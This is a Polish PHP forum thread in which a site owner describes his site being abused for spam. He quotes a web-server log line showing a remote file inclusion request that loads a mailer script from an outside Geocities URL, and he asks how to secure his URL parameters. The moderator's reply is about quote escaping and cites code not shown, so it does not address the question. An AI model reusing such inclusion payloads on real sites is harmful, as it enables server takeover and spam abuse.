![]() |
![]() |
![]() ![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 0 Dołączył: 18.12.2006 Ostrzeżenie: (0%) ![]() ![]() |
Witam.
Miałem nie dawno przykre doświadczenie z wykorzystaniem mojego skryptu do rozsyłania spamu. Struktura moich adresów www była nateępująca: http://domena.pl/?dzial=katalog& str=nazwa_pliku
Niestety skrypt został wykorzystany przeciwko mnie: 196.207.13.162 - - [14/Dec/2006:15:23:38 +0100] "POST /?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt? HTTP/1.1" 200 20865 "http://domena.pl/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" W konsekwencji zmienna dział pozwala na wykorzystywanie obcych skryptów. W jaki sposób mam przekształcić prosty skrypt, aby nie umożliwiał zmiennej dział i str na tego typu działania. Bardzo proszę o pomoc z uwagi na to że mój serwis został zablokowany. |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Moderatorzy Postów: 36 559 Pomógł: 6315 Dołączył: 27.12.2004 ![]() |
no ale co to ma byc? nie wiesz, ze jesli dasz \" - to takie cos oznacza ze wstawiasz ". I taki zapis powoduje ze masz niepodomykane ". skladniowo poprawnie powinno byc tak:
ale czy to bedzie to samo wyrazenie co chciales to juz nie wiem Cytat F1, F1, F1.. Daruj sobie. napisz po ludzku "Pomoc". to nie tak ciezkoproszę poprawić tytuł o znacznik zgodnie z zasadami forum Przedszkole: Temat: Tematyka i zasady panujace na forum Przedszkole |
|
|
![]() ![]() |
![]() |
Aktualny czas: 17.10.2025 - 03:03 |